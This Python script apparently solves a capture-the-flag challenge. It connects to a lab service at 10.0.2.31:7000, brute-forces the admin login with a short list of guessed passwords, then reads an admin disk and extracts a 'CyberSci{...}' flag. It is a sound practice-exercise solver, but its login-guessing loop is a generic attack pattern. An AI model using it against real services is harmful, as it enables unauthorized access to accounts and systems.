#!/usr/bin/env python3
import socket
import time
import sys

def interact(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    
    try:
        print(f"[*] Connecting to {host}:{port}...")
        s.connect((host, port))
        
        # Receive initial data
        time.sleep(1)
        data = s.recv(4096).decode('utf-8', errors='ignore')
        print(data)
        
        # Go to admin login
        print("\n[*] Selecting option 4 (ADMIN LOGIN)...")
        s.sendall(b'4\n')
        time.sleep(0.5)
        data = s.recv(4096).decode('utf-8', errors='ignore')
        print(data)
        
        # Try passwords
        passwords = [
            'rust',
            'rustinpeace', 
            'RUST',
            'peace',
            'megadeth',
            'archivist',
            '2087',
            'admin',
            'password',
            'r',
            'u',
            's',
            't'
        ]
        
        for pwd in passwords:
            print(f"\n[*] Trying password: '{pwd}'")
            s.sendall((pwd + '\n').encode())
            time.sleep(0.5)
            
            data = s.recv(4096).decode('utf-8', errors='ignore')
            print(data)
            
            if 'ACCESS GRANTED' in data or 'SUCCESS' in data or 'Administrator privileges' in data:
                print(f"\n[+] SUCCESS! Password is: {pwd}")
                
                # Continue to load admin disk
                time.sleep(1)
                s.sendall(b'1\n')  # Load disk
                time.sleep(0.5)
                data = s.recv(4096).decode('utf-8', errors='ignore')
                print(data)
                
                s.sendall(b'4\n')  # Select ADMIN disk
                time.sleep(0.5)
                data = s.recv(4096).decode('utf-8', errors='ignore')
                print(data)
                
                s.sendall(b'1\n')  # View content
                time.sleep(1)
                data = s.recv(8192).decode('utf-8', errors='ignore')
                print("\n[+] ADMIN DISK CONTENT:")
                print(data)
                
                # Look for flag
                if 'CyberSci{' in data:
                    import re
                    flag = re.search(r'CyberSci\{[^}]+\}', data)
                    if flag:
                        print(f"\n[+] FLAG FOUND: {flag.group()}")
                
                return True
            elif 'DENIED' in data or 'Incorrect' in data:
                print("[-] Password incorrect, trying next...")
                # Reconnect for next attempt
                s.close()
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(10)
                s.connect((host, port))
                time.sleep(1)
                s.recv(4096)  # Clear buffer
                s.sendall(b'4\n')  # Go back to admin login
                time.sleep(0.5)
                s.recv(4096)
            else:
                print("[?] Unexpected response")
        
        print("\n[-] All passwords failed")
        return False
        
    except socket.timeout:
        print("[!] Connection timed out")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        import traceback
        traceback.print_exc()
        return False
    finally:
        s.close()

if __name__ == "__main__":
    interact('10.0.2.31', 7000)